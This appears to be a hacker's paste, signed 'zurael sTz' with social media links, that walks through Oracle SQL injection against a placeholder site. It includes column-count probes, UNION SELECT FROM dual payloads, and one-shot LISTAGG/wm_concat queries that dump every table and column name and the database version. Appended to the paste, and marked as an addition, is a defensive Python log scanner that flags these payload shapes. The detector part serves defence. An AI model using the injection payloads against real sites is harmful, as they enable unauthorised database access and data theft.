- <===============Hacker zurael sTz===============>
- =================twitter=============================
- https://twitter.com/zurael_stz
- =================facebook============================
- https://www.facebook.com/sTzisrael/
- =====================================================
- =================telegram============================
- https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
- =====================================================
- <===============Hacker zurael sTz===============>
- Oracle SQL Injection and DIOS query
- http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
- No Error
- http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
- No Error
- http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
- Error
- http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
- ctrl+u (view-source:)
- view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
- view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
- view-source:}
- <meta name="description" content="11111" />
- <meta name="description" content="1" />
- }
- '">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
- (select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
- http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
- (select banner from v$version where rownum=1)
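The request shapes in the steps above leave a recognisable trail in web server access logs. As an added example (not part of the original paste), this Python sketch flags them in combined-format log lines; the rule names, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Rule name -> pattern; each pattern mirrors a payload shape shown in the paste.
RULES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+\s*--"),
    "union select from dual": re.compile(r"\bunion\s+(all\s+)?select\b.*\bfrom\s+dual\b"),
    "oracle dictionary view": re.compile(r"\b(all_tables|all_tab_columns|v\$version)\b"),
    "row aggregation": re.compile(r"\b(listagg|wm_concat)\s*\("),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_request(target):
    """Return the sorted names of rules matched by any query parameter value."""
    hits = set()
    # parse_qsl percent-decodes each value and turns '+' into a space.
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = " ".join(value.lower().split())  # fold case, collapse whitespace
        hits.update(rule for rule, pat in RULES.items() if pat.search(text))
    return sorted(hits)

def scan_log_line(line):
    """Extract the request target from a combined-format log line and scan it."""
    m = REQUEST.search(line)
    return scan_request(m.group(1)) if m else []

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /pages.php?p=cut-linear&lang=it HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Mar/2024:10:00:09 +0000] "GET /pages.php?p=cut-linear%27)%20order%20by%205--&lang=it HTTP/1.1" 500 312',
    '203.0.113.7 - - [10/Mar/2024:10:00:20 +0000] "GET /pages.php?p=cut-linear%27)%20Union%20All%20Select%20NULL,NULL,NULL,NULL%20from%20dual--&lang=it HTTP/1.1" 200 5200',
    '203.0.113.7 - - [10/Mar/2024:10:00:41 +0000] "GET /pages.php?p=x%27)%20and%201=0%20union%20select%20null,'
    '(select%20LISTAGG(table_name,%27,%27)%20within%20group%20(ORDER%20BY%20table_name)%20from%20all_tables)'
    ',NULL,NULL%20from%20dual--&lang=it HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_log_line(entry), entry.split('"')[1][:60])
```

A match is a triage signal, not a fix: the injection itself goes away only when the page's query binds the `p` parameter as a variable instead of concatenating it into the SQL text.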